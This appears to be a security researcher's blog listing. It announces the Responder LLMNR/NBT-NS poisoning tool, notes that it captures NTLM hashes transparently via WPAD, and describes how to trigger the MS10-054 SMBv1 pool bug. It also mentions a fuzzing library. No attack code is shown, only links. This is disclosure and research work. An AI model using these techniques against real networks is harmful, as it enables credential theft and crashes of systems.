Some fun with Responder 1.8

I've made a short video on Responder 1.8 usage and examples.

This video can be found here: http://www.youtube.com/watch?v=nkpK5lIPHg8

Note that on the latest version, when you open IE * you wont get any password prompt for WPAD (not like in this video) and your browser will send your NTLM hashes along transparently.

As always, latest version can be found here: https://github.com/SpiderLabs/Responder/

Cheers

Owning Windows Networks with Responder 1.7

Full post and download link can be found here :

http://blog.spiderlabs.com/2013/01/owning-windows-networks-with-responder-17.html

Introducing Responder 1.0

I recently released a LLMNR/NBT-NS responder with several rogue auth servers.

Full details about this tool and download link can be found here : http://blog.spiderlabs.com/2012/10/introducing-responder-10.html

When MSFT does not respect their own protocol.

According to this : http://support.microsoft.com/kb/909264

NetBIOS computer names cannot contain the following characters:

• backslash (\)
• slash mark (/)
• colon (:)
• asterisk (*)
• question mark (?)
• quotation mark (")
• less than sign (<)
• greater than sign (>)
• vertical bar (|)

Let see how MSFT implemented their own protocol in their in house tools:

Ok great...

What about the rest ?

Alright. Let's see:

MSFT Rule #78: Do what I say, not what I do.

*Update:

Net view example:

Slides for Turning Client Side To Server Side RuxMon 2011 (Melbourne)

Long time no blog;
I gave that talk in March 2011 at Ruxmon.
I thought I should share this, since this blog is a kinda repository of some bugs i've published.

Thanks to the ruxcon&ruxmon crew !

http://www.slideshare.net/fullscreen/lgandx/turning-clientsidetoserversideruxcon2011laurent/1

MS SMB Remote Trans2 Zero Size Pool Allocation (MS10-054)

This SMBv1 vulnerability has been disclosed to MS back in february 2010 and patched this month in MS10-054 bulletin.

This vulnerability is quite interesting since it's present in all Windows version since Windows 2000, and can be triggered easily in at least 2 different Trans2 opcode by setting a Max Data Count to 0;
- QUERY_FS_INFO Query FS Attribute Info
- QUERY_FS_INFO, Query FS Volume Info


You can find the full advisory here: http://seclists.org/fulldisclosure/2010/Aug/122
SRD blog entry: http://blogs.technet.com/b/srd/archive/2010/08/10/ms10-054-exploitability-details-for-the-smb-server-update.aspx

Fuzzing lib released

This is a fuzzing lib I've been working on for a while (it's not a complete one, but still pretty powerfull), you can adapt it very easily to your fuzzer by invoking ;

import lib
from lib import *

Then you call one specific function, or randfunc().
randfunc will basicaly choose randomly the function in the lib to fuzz with. 

Here's a quick example using this lib;

http://pastebin.com/fNFAW3Fh   -- > this is not a smb fuzzer, it's simply an example of using this lib....

And yes you need to include the lib, which is located here ;

http://pastebin.com/xgPXpGtw

Enjoy !